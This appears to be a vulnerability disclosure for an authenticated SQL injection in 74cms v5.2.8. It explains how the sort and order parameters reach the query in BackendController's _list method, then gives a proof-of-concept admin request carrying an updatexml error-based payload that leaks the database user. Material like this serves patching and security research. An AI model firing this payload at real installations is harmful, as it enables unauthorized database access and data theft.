74cms v5.2.8 SQLI

Detail

The vulnerability is generated by the _list method in the Common/Controller/BackendController.class.php file, using the I() in the _list method to receive the sort and order parameters, and the splicing assignment to $order_by.

$order_by enters the SQL query by splicing, resulting in SQL injection.

The _list method is called in the index method.

Taking Admin/Controller/AdController.class.php as an example, the AdController class inherits the BackendController class and calls index() in the category method.

PoC

Log in to the administrator account and send the following request packet.

GET /74cms/upload/index.php?m=Admin&c=Ad&a=category&sort=1&order=and+updatexml(0,concat(0x7e,user()),0) HTTP/1.1
Host: [::]
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://[::]/74cms/upload/index.php?m=Admin&c=index&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: XDEBUG_SESSION=PHPSTORM; think_template=default; PHPSESSID=4gibptgp8kflrc0f9sd2t8pfm0; think_language=zh-CN
Connection: close

success